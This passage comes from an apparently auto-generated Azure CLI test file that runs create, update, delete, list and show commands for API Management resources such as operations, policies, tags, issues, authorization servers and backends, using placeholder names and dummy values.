# create_or_update -- update
self.cmd('apim api operation update --resource-group "rg1" --service-name "apimService1" --api-id "PetStoreTemplate2" --operation-id "newoperations" --description "This can only be done by the logged in user." --display-name "createUser2" --method "POST" --url-template "/user1"', checks=[
])
self.cmd('apim api operation update --resource-group "rg1" --service-name "apimService1" --api-id "echo-api" --operation-id "operationId" --display-name "Retrieve resource" --method "GET" --url-template "/resource"', checks=[
])
self.cmd('apim api operation update --resource-group "rg1" --service-name "apimService1" --api-id "57d2ef278aa04f0888cba3f3" --operation-id "57d2ef278aa04f0ad01d6cdc"', checks=[
])
# delete -- delete
self.cmd('apim api operation delete --resource-group "rg1" --service-name "apimService1" --api-id "PetStoreTemplate2" --operation-id "newoperations"', checks=[
])
self.cmd('apim api operation delete --resource-group "rg1" --service-name "apimService1" --api-id "echo-api" --operation-id "operationId"', checks=[
])
self.cmd('apim api operation delete --resource-group "rg1" --service-name "apimService1" --api-id "57d2ef278aa04f0888cba3f3" --operation-id "57d2ef278aa04f0ad01d6cdc"', checks=[
])
# list_by_api -- list
self.cmd('apim api operation list --resource-group "rg1" --service-name "apimService1" --api-id "PetStoreTemplate2"', checks=[
])
self.cmd('apim api operation list --resource-group "rg1" --service-name "apimService1" --api-id "echo-api"', checks=[
])
self.cmd('apim api operation list --resource-group "rg1" --service-name "apimService1" --api-id "57d2ef278aa04f0888cba3f3"', checks=[
])
# get -- show
self.cmd('apim api operation show --resource-group "rg1" --service-name "apimService1" --api-id "PetStoreTemplate2" --operation-id "newoperations"', checks=[
])
self.cmd('apim api operation show --resource-group "rg1" --service-name "apimService1" --api-id "echo-api" --operation-id "operationId"', checks=[
])
self.cmd('apim api operation show --resource-group "rg1" --service-name "apimService1" --api-id "57d2ef278aa04f0888cba3f3" --operation-id "57d2ef278aa04f0ad01d6cdc"', checks=[
])
# create_or_update -- create
self.cmd('apim api operation policy create --resource-group "rg1" --service-name "apimService1" --api-id "5600b57e7e8880006a040001" --operation-id "5600b57e7e8880006a080001" --policy-id "policy" --value "<policies> <inbound /> <backend> <forward-request /> </backend> <outbound /></policies>" --format "xml"', checks=[
])
self.cmd('apim api operation policy create --resource-group "rg1" --service-name "apimService1" --api-id "testapi" --operation-id "testoperation" --policy-id "policy"', checks=[
])
# create_or_update -- update
self.cmd('apim api operation policy update --resource-group "rg1" --service-name "apimService1" --api-id "5600b57e7e8880006a040001" --operation-id "5600b57e7e8880006a080001" --policy-id "policy" --value "<policies> <inbound /> <backend> <forward-request /> </backend> <outbound /></policies>" --format "xml"', checks=[
])
self.cmd('apim api operation policy update --resource-group "rg1" --service-name "apimService1" --api-id "testapi" --operation-id "testoperation" --policy-id "policy"', checks=[
])
# delete -- delete
self.cmd('apim api operation policy delete --resource-group "rg1" --service-name "apimService1" --api-id "5600b57e7e8880006a040001" --operation-id "5600b57e7e8880006a080001" --policy-id "policy"', checks=[
])
self.cmd('apim api operation policy delete --resource-group "rg1" --service-name "apimService1" --api-id "testapi" --operation-id "testoperation" --policy-id "policy"', checks=[
])
# list_by_operation -- list
self.cmd('apim api operation policy list --resource-group "rg1" --service-name "apimService1" --api-id "5600b57e7e8880006a040001" --operation-id "5600b57e7e8880006a080001"', checks=[
])
self.cmd('apim api operation policy list --resource-group "rg1" --service-name "apimService1" --api-id "testapi" --operation-id "testoperation"', checks=[
])
# get -- show
self.cmd('apim api operation policy show --resource-group "rg1" --service-name "apimService1" --api-id "5600b57e7e8880006a040001" --operation-id "5600b57e7e8880006a080001" --format "xml" --policy-id "policy"', checks=[
])
self.cmd('apim api operation policy show --resource-group "rg1" --service-name "apimService1" --api-id "testapi" --operation-id "testoperation" --policy-id "policy"', checks=[
])
# create_or_update -- create
self.cmd('apim tag create --resource-group "rg1" --service-name "apimService1" --tag-id "tagId1" --display-name "tag1"', checks=[
])
self.cmd('apim tag create --resource-group "rg1" --service-name "apimService1" --tag-id "temptag" --display-name "temp tag"', checks=[
])
self.cmd('apim tag create --resource-group "rg1" --service-name "apimService1" --tag-id "tagId1"', checks=[
])
# create_or_update -- update
self.cmd('apim tag update --resource-group "rg1" --service-name "apimService1" --tag-id "tagId1" --display-name "tag1"', checks=[
])
self.cmd('apim tag update --resource-group "rg1" --service-name "apimService1" --tag-id "temptag" --display-name "temp tag"', checks=[
])
self.cmd('apim tag update --resource-group "rg1" --service-name "apimService1" --tag-id "tagId1"', checks=[
])
# delete -- delete
self.cmd('apim tag delete --resource-group "rg1" --service-name "apimService1" --tag-id "tagId1"', checks=[
])
self.cmd('apim tag delete --resource-group "rg1" --service-name "apimService1" --tag-id "temptag"', checks=[
])
self.cmd('apim tag delete --resource-group "rg1" --service-name "apimService1" --tag-id "tagId1"', checks=[
])
# list_by_operation -- list
self.cmd('apim tag list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim tag list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim tag list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# list_by_product -- list
self.cmd('apim tag list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim tag list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim tag list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# list_by_api -- list
self.cmd('apim tag list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim tag list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim tag list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# list_by_service -- list
self.cmd('apim tag list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim tag list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim tag list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# get -- show
self.cmd('apim tag show --resource-group "rg1" --service-name "apimService1" --tag-id "tagId1"', checks=[
])
self.cmd('apim tag show --resource-group "rg1" --service-name "apimService1" --tag-id "temptag"', checks=[
])
self.cmd('apim tag show --resource-group "rg1" --service-name "apimService1" --tag-id "tagId1"', checks=[
])
# create_or_update -- create
self.cmd('apim api policy create --resource-group "rg1" --service-name "apimService1" --api-id "5600b57e7e8880006a040001" --policy-id "policy" --value "<policies> <inbound /> <backend> <forward-request /> </backend> <outbound /></policies>" --format "xml"', checks=[
])
self.cmd('apim api policy create --resource-group "rg1" --service-name "apimService1" --api-id "5600b57e7e8880006a040001" --policy-id "policy" --value "<policies>\r\n <inbound>\r\n <base />\r\n <set-header name=\"newvalue\" exists-action=\"override\">\r\n <value>\"@(context.Request.Headers.FirstOrDefault(h => h.Ke==\"Via\"))\" </value>\r\n </set-header>\r\n </inbound>\r\n </policies>" --format "rawxml"', checks=[
])
self.cmd('apim api policy create --resource-group "rg1" --service-name "apimService1" --api-id "loggerId" --policy-id "policy"', checks=[
])
# create_or_update -- update
self.cmd('apim api policy update --resource-group "rg1" --service-name "apimService1" --api-id "5600b57e7e8880006a040001" --policy-id "policy" --value "<policies> <inbound /> <backend> <forward-request /> </backend> <outbound /></policies>" --format "xml"', checks=[
])
self.cmd('apim api policy update --resource-group "rg1" --service-name "apimService1" --api-id "5600b57e7e8880006a040001" --policy-id "policy" --value "<policies>\r\n <inbound>\r\n <base />\r\n <set-header name=\"newvalue\" exists-action=\"override\">\r\n <value>\"@(context.Request.Headers.FirstOrDefault(h => h.Ke==\"Via\"))\" </value>\r\n </set-header>\r\n </inbound>\r\n </policies>" --format "rawxml"', checks=[
])
self.cmd('apim api policy update --resource-group "rg1" --service-name "apimService1" --api-id "loggerId" --policy-id "policy"', checks=[
])
# delete -- delete
self.cmd('apim api policy delete --resource-group "rg1" --service-name "apimService1" --api-id "5600b57e7e8880006a040001" --policy-id "policy"', checks=[
])
self.cmd('apim api policy delete --resource-group "rg1" --service-name "apimService1" --api-id "5600b57e7e8880006a040001" --policy-id "policy"', checks=[
])
self.cmd('apim api policy delete --resource-group "rg1" --service-name "apimService1" --api-id "loggerId" --policy-id "policy"', checks=[
])
# list_by_api -- list
self.cmd('apim api policy list --resource-group "rg1" --service-name "apimService1" --api-id "5600b57e7e8880006a040001"', checks=[
])
self.cmd('apim api policy list --resource-group "rg1" --service-name "apimService1" --api-id "5600b57e7e8880006a040001"', checks=[
])
self.cmd('apim api policy list --resource-group "rg1" --service-name "apimService1" --api-id "loggerId"', checks=[
])
# get -- show
self.cmd('apim api policy show --resource-group "rg1" --service-name "apimService1" --api-id "5600b57e7e8880006a040001" --policy-id "policy" --format "xml"', checks=[
])
self.cmd('apim api policy show --resource-group "rg1" --service-name "apimService1" --api-id "5600b57e7e8880006a040001" --policy-id "policy" --format "rawxml"', checks=[
])
self.cmd('apim api policy show --resource-group "rg1" --service-name "apimService1" --api-id "loggerId" --policy-id "policy"', checks=[
])
# create_or_update -- create
self.cmd('apim api schema create --resource-group "rg1" --service-name "apimService1" --api-id "59d6bb8f1f7fab13dc67ec9b" --schema-id "ec12520d-9d48-4e7b-8f39-698ca2ac63f1" --content-type "application/vnd.ms-azure-apim.xsd+xml"', checks=[
])
self.cmd('apim api schema create --resource-group "rg1" --service-name "apimService1" --api-id "59d5b28d1f7fab116c282650" --schema-id "59d5b28e1f7fab116402044e"', checks=[
])
# create_or_update -- update
self.cmd('apim api schema update --resource-group "rg1" --service-name "apimService1" --api-id "59d6bb8f1f7fab13dc67ec9b" --schema-id "ec12520d-9d48-4e7b-8f39-698ca2ac63f1" --content-type "application/vnd.ms-azure-apim.xsd+xml"', checks=[
])
self.cmd('apim api schema update --resource-group "rg1" --service-name "apimService1" --api-id "59d5b28d1f7fab116c282650" --schema-id "59d5b28e1f7fab116402044e"', checks=[
])
# delete -- delete
self.cmd('apim api schema delete --resource-group "rg1" --service-name "apimService1" --api-id "59d6bb8f1f7fab13dc67ec9b" --schema-id "ec12520d-9d48-4e7b-8f39-698ca2ac63f1"', checks=[
])
self.cmd('apim api schema delete --resource-group "rg1" --service-name "apimService1" --api-id "59d5b28d1f7fab116c282650" --schema-id "59d5b28e1f7fab116402044e"', checks=[
])
# list_by_api -- list
self.cmd('apim api schema list --resource-group "rg1" --service-name "apimService1" --api-id "59d6bb8f1f7fab13dc67ec9b"', checks=[
])
self.cmd('apim api schema list --resource-group "rg1" --service-name "apimService1" --api-id "59d5b28d1f7fab116c282650"', checks=[
])
# get -- show
self.cmd('apim api schema show --resource-group "rg1" --service-name "apimService1" --api-id "59d6bb8f1f7fab13dc67ec9b" --schema-id "ec12520d-9d48-4e7b-8f39-698ca2ac63f1"', checks=[
])
self.cmd('apim api schema show --resource-group "rg1" --service-name "apimService1" --api-id "59d5b28d1f7fab116c282650" --schema-id "59d5b28e1f7fab116402044e"', checks=[
])
# create_or_update -- create
self.cmd('apim api diagnostic create --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --diagnostic-id "applicationinsights" --always-log "allErrors" --logger-id "/loggers/applicationinsights"', checks=[
])
self.cmd('apim api diagnostic create --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --diagnostic-id "applicationinsights" --always-log "allErrors" --logger-id "/loggers/applicationinsights"', checks=[
])
self.cmd('apim api diagnostic create --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --diagnostic-id "applicationinsights"', checks=[
])
# create_or_update -- update
self.cmd('apim api diagnostic update --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --diagnostic-id "applicationinsights" --always-log "allErrors" --logger-id "/loggers/applicationinsights"', checks=[
])
self.cmd('apim api diagnostic update --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --diagnostic-id "applicationinsights" --always-log "allErrors" --logger-id "/loggers/applicationinsights"', checks=[
])
self.cmd('apim api diagnostic update --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --diagnostic-id "applicationinsights"', checks=[
])
# delete -- delete
self.cmd('apim api diagnostic delete --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --diagnostic-id "applicationinsights"', checks=[
])
self.cmd('apim api diagnostic delete --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --diagnostic-id "applicationinsights"', checks=[
])
self.cmd('apim api diagnostic delete --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --diagnostic-id "applicationinsights"', checks=[
])
# list_by_service -- list
self.cmd('apim api diagnostic list --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a"', checks=[
])
self.cmd('apim api diagnostic list --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a"', checks=[
])
self.cmd('apim api diagnostic list --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a"', checks=[
])
# get -- show
self.cmd('apim api diagnostic show --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --diagnostic-id "applicationinsights"', checks=[
])
self.cmd('apim api diagnostic show --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --diagnostic-id "applicationinsights"', checks=[
])
self.cmd('apim api diagnostic show --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --diagnostic-id "applicationinsights"', checks=[
])
# create_or_update -- create
self.cmd('apim api issue create --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc" --created-date "2018-02-01T22:21:20.467Z" --state "open" --title "New API issue" --description "New API issue description" --user-id "/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.ApiManagement/service/{{ service_name }}/users/{{ user_name }}"', checks=[
])
self.cmd('apim api issue create --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc" --state "closed"', checks=[
])
self.cmd('apim api issue create --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc"', checks=[
])
# create_or_update -- update
self.cmd('apim api issue update --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc" --created-date "2018-02-01T22:21:20.467Z" --state "open" --title "New API issue" --description "New API issue description" --user-id "/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.ApiManagement/service/{{ service_name }}/users/{{ user_name }}"', checks=[
])
self.cmd('apim api issue update --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc" --state "closed"', checks=[
])
self.cmd('apim api issue update --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc"', checks=[
])
# delete -- delete
self.cmd('apim api issue delete --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc"', checks=[
])
self.cmd('apim api issue delete --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc"', checks=[
])
self.cmd('apim api issue delete --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc"', checks=[
])
# list_by_service -- list
self.cmd('apim api issue list --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a"', checks=[
])
self.cmd('apim api issue list --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a"', checks=[
])
self.cmd('apim api issue list --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a"', checks=[
])
# get -- show
self.cmd('apim api issue show --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc"', checks=[
])
self.cmd('apim api issue show --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc"', checks=[
])
self.cmd('apim api issue show --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc"', checks=[
])
# create_or_update -- create
self.cmd('apim api issue comment create --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc" --comment-id "599e29ab193c3c0bd0b3e2fb" --text "Issue comment." --created-date "2018-02-01T22:21:20.467Z" --user-id "/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.ApiManagement/service/{{ service_name }}/users/{{ user_name }}"', checks=[
])
self.cmd('apim api issue comment create --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc" --comment-id "599e29ab193c3c0bd0b3e2fb"', checks=[
])
# create_or_update -- update
self.cmd('apim api issue comment update --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc" --comment-id "599e29ab193c3c0bd0b3e2fb" --text "Issue comment." --created-date "2018-02-01T22:21:20.467Z" --user-id "/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.ApiManagement/service/{{ service_name }}/users/{{ user_name }}"', checks=[
])
self.cmd('apim api issue comment update --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc" --comment-id "599e29ab193c3c0bd0b3e2fb"', checks=[
])
# delete -- delete
self.cmd('apim api issue comment delete --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc" --comment-id "599e29ab193c3c0bd0b3e2fb"', checks=[
])
self.cmd('apim api issue comment delete --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc" --comment-id "599e29ab193c3c0bd0b3e2fb"', checks=[
])
# list_by_service -- list
self.cmd('apim api issue comment list --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc"', checks=[
])
self.cmd('apim api issue comment list --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc"', checks=[
])
# get -- show
self.cmd('apim api issue comment show --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc" --comment-id "599e29ab193c3c0bd0b3e2fb"', checks=[
])
self.cmd('apim api issue comment show --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc" --comment-id "599e29ab193c3c0bd0b3e2fb"', checks=[
])
# create_or_update -- create
self.cmd('apim api issue attachment create --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc" --attachment-id "57d2ef278aa04f0888cba3f3" --title "Issue attachment." --content-format "image/jpeg" --content "IEJhc2U2NA=="', checks=[
])
self.cmd('apim api issue attachment create --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc" --attachment-id "57d2ef278aa04f0888cba3f3"', checks=[
])
# create_or_update -- update
self.cmd('apim api issue attachment update --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc" --attachment-id "57d2ef278aa04f0888cba3f3" --title "Issue attachment." --content-format "image/jpeg" --content "IEJhc2U2NA=="', checks=[
])
self.cmd('apim api issue attachment update --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc" --attachment-id "57d2ef278aa04f0888cba3f3"', checks=[
])
# delete -- delete
self.cmd('apim api issue attachment delete --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc" --attachment-id "57d2ef278aa04f0888cba3f3"', checks=[
])
self.cmd('apim api issue attachment delete --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc" --attachment-id "57d2ef278aa04f0888cba3f3"', checks=[
])
# list_by_service -- list
self.cmd('apim api issue attachment list --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc"', checks=[
])
self.cmd('apim api issue attachment list --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc"', checks=[
])
# get -- show
self.cmd('apim api issue attachment show --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc" --attachment-id "57d2ef278aa04f0888cba3f3"', checks=[
])
self.cmd('apim api issue attachment show --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc" --attachment-id "57d2ef278aa04f0888cba3f3"', checks=[
])
# create_or_update -- create
self.cmd('apim api tag-description create --resource-group "rg1" --service-name "apimService1" --api-id "5931a75ae4bbd512a88c680b" --tag-id "tagId1" --description "Some description that will be displayed for operation's tag if the tag is assigned to operation of the API" --external-docs-url "http://some.url/additionaldoc" --external-docs-description "Description of the external docs resource"', checks=[
])
self.cmd('apim api tag-description create --resource-group "rg1" --service-name "apimService1" --api-id "59d5b28d1f7fab116c282650" --tag-id "59d5b28e1f7fab116402044e"', checks=[
])
# create_or_update -- update
self.cmd('apim api tag-description update --resource-group "rg1" --service-name "apimService1" --api-id "5931a75ae4bbd512a88c680b" --tag-id "tagId1" --description "Some description that will be displayed for operation's tag if the tag is assigned to operation of the API" --external-docs-url "http://some.url/additionaldoc" --external-docs-description "Description of the external docs resource"', checks=[
])
self.cmd('apim api tag-description update --resource-group "rg1" --service-name "apimService1" --api-id "59d5b28d1f7fab116c282650" --tag-id "59d5b28e1f7fab116402044e"', checks=[
])
# delete -- delete
self.cmd('apim api tag-description delete --resource-group "rg1" --service-name "apimService1" --api-id "5931a75ae4bbd512a88c680b" --tag-id "tagId1"', checks=[
])
self.cmd('apim api tag-description delete --resource-group "rg1" --service-name "apimService1" --api-id "59d5b28d1f7fab116c282650" --tag-id "59d5b28e1f7fab116402044e"', checks=[
])
# list_by_service -- list
self.cmd('apim api tag-description list --resource-group "rg1" --service-name "apimService1" --api-id "5931a75ae4bbd512a88c680b"', checks=[
])
self.cmd('apim api tag-description list --resource-group "rg1" --service-name "apimService1" --api-id "59d5b28d1f7fab116c282650"', checks=[
])
# get -- show
self.cmd('apim api tag-description show --resource-group "rg1" --service-name "apimService1" --api-id "5931a75ae4bbd512a88c680b" --tag-id "tagId1"', checks=[
])
self.cmd('apim api tag-description show --resource-group "rg1" --service-name "apimService1" --api-id "59d5b28d1f7fab116c282650" --tag-id "59d5b28e1f7fab116402044e"', checks=[
])
# create_or_update -- create
self.cmd('apim api-version-set create --resource-group "rg1" --service-name "apimService1" --version-set-id "api1" --description "Version configuration" --display-name "api set 1" --versioning-scheme "Segment"', checks=[
])
self.cmd('apim api-version-set create --resource-group "rg1" --service-name "apimService1" --version-set-id "api1" --description "Version configuration" --display-name "api set 1" --versioning-scheme "Segment"', checks=[
])
self.cmd('apim api-version-set create --resource-group "rg1" --service-name "apimService1" --version-set-id "a1"', checks=[
])
# create_or_update -- update
self.cmd('apim api-version-set update --resource-group "rg1" --service-name "apimService1" --version-set-id "api1" --description "Version configuration" --display-name "api set 1" --versioning-scheme "Segment"', checks=[
])
self.cmd('apim api-version-set update --resource-group "rg1" --service-name "apimService1" --version-set-id "api1" --description "Version configuration" --display-name "api set 1" --versioning-scheme "Segment"', checks=[
])
self.cmd('apim api-version-set update --resource-group "rg1" --service-name "apimService1" --version-set-id "a1"', checks=[
])
# delete -- delete
self.cmd('apim api-version-set delete --resource-group "rg1" --service-name "apimService1" --version-set-id "api1"', checks=[
])
self.cmd('apim api-version-set delete --resource-group "rg1" --service-name "apimService1" --version-set-id "api1"', checks=[
])
self.cmd('apim api-version-set delete --resource-group "rg1" --service-name "apimService1" --version-set-id "a1"', checks=[
])
# list_by_service -- list
self.cmd('apim api-version-set list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api-version-set list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api-version-set list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# get -- show
self.cmd('apim api-version-set show --resource-group "rg1" --service-name "apimService1" --version-set-id "api1"', checks=[
])
self.cmd('apim api-version-set show --resource-group "rg1" --service-name "apimService1" --version-set-id "api1"', checks=[
])
self.cmd('apim api-version-set show --resource-group "rg1" --service-name "apimService1" --version-set-id "a1"', checks=[
])
# create_or_update -- create
self.cmd('apim authorization-server create --resource-group "rg1" --service-name "apimService1" --authsid "newauthServer" --description "test server" --token-endpoint "https://www.contoso.com/oauth2/token" --support-state true --default-scope "read write" --client-secret "2" --resource-owner-username "un" --resource-owner-password "pwd" --display-name "test2" --client-registration-endpoint "https://www.contoso.com/apps" --authorization-endpoint "https://www.contoso.com/oauth2/auth" --client-id "1"', checks=[
])
self.cmd('apim authorization-server create --resource-group "rg1" --service-name "apimService1" --authsid "newauthServer" --client-secret "updated" --client-id "update"', checks=[
])
self.cmd('apim authorization-server create --resource-group "rg1" --service-name "apimService1" --authsid "newauthServer2"', checks=[
])
# create_or_update -- update
self.cmd('apim authorization-server update --resource-group "rg1" --service-name "apimService1" --authsid "newauthServer" --description "test server" --token-endpoint "https://www.contoso.com/oauth2/token" --support-state true --default-scope "read write" --client-secret "2" --resource-owner-username "un" --resource-owner-password "pwd" --display-name "test2" --client-registration-endpoint "https://www.contoso.com/apps" --authorization-endpoint "https://www.contoso.com/oauth2/auth" --client-id "1"', checks=[
])
self.cmd('apim authorization-server update --resource-group "rg1" --service-name "apimService1" --authsid "newauthServer" --client-secret "updated" --client-id "update"', checks=[
])
self.cmd('apim authorization-server update --resource-group "rg1" --service-name "apimService1" --authsid "newauthServer2"', checks=[
])
# delete -- delete
self.cmd('apim authorization-server delete --resource-group "rg1" --service-name "apimService1" --authsid "newauthServer"', checks=[
])
self.cmd('apim authorization-server delete --resource-group "rg1" --service-name "apimService1" --authsid "newauthServer"', checks=[
])
self.cmd('apim authorization-server delete --resource-group "rg1" --service-name "apimService1" --authsid "newauthServer2"', checks=[
])
# list_by_service -- list
self.cmd('apim authorization-server list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim authorization-server list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim authorization-server list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# get -- show
self.cmd('apim authorization-server show --resource-group "rg1" --service-name "apimService1" --authsid "newauthServer"', checks=[
])
self.cmd('apim authorization-server show --resource-group "rg1" --service-name "apimService1" --authsid "newauthServer"', checks=[
])
self.cmd('apim authorization-server show --resource-group "rg1" --service-name "apimService1" --authsid "newauthServer2"', checks=[
])
# create_or_update -- create
self.cmd('apim backend create --resource-group "rg1" --service-name "apimService1" --backend-id "sfbackend" --description "Service Fabric Test App 1" --url "fabric:/mytestapp/mytestservice" --protocol "http"', checks=[
])
self.cmd('apim backend create --resource-group "rg1" --service-name "apimService1" --backend-id "proxybackend" --description "description5308" --url "https://backendname2644/" --protocol "http"', checks=[
])
self.cmd('apim backend create --resource-group "rg1" --service-name "apimService1" --backend-id "proxybackend" --description "description5308"', checks=[
])
self.cmd('apim backend create --resource-group "rg1" --service-name "apimService1" --backend-id "sfbackend"', checks=[
])
# create_or_update -- update
self.cmd('apim backend update --resource-group "rg1" --service-name "apimService1" --backend-id "sfbackend" --description "Service Fabric Test App 1" --url "fabric:/mytestapp/mytestservice" --protocol "http"', checks=[
])
self.cmd('apim backend update --resource-group "rg1" --service-name "apimService1" --backend-id "proxybackend" --description "description5308" --url "https://backendname2644/" --protocol "http"', checks=[
])
self.cmd('apim backend update --resource-group "rg1" --service-name "apimService1" --backend-id "proxybackend" --description "description5308"', checks=[
])
self.cmd('apim backend update --resource-group "rg1" --service-name "apimService1" --backend-id "sfbackend"', checks=[
])
# delete -- delete
self.cmd('apim backend delete --resource-group "rg1" --service-name "apimService1" --backend-id "sfbackend"', checks=[
])
self.cmd('apim backend delete --resource-group "rg1" --service-name "apimService1" --backend-id "proxybackend"', checks=[
])
self.cmd('apim backend delete --resource-group "rg1" --service-name "apimService1" --backend-id "proxybackend"', checks=[
])
self.cmd('apim backend delete --resource-group "rg1" --service-name "apimService1" --backend-id "sfbackend"', checks=[
])
# list_by_service -- list
self.cmd('apim backend list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim backend list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim backend list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim backend list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# get -- show
self.cmd('apim backend show --resource-group "rg1" --service-name "apimService1" --backend-id "sfbackend"', checks=[
])
self.cmd('apim backend show --resource-group "rg1" --service-name "apimService1" --backend-id "proxybackend"', checks=[
])
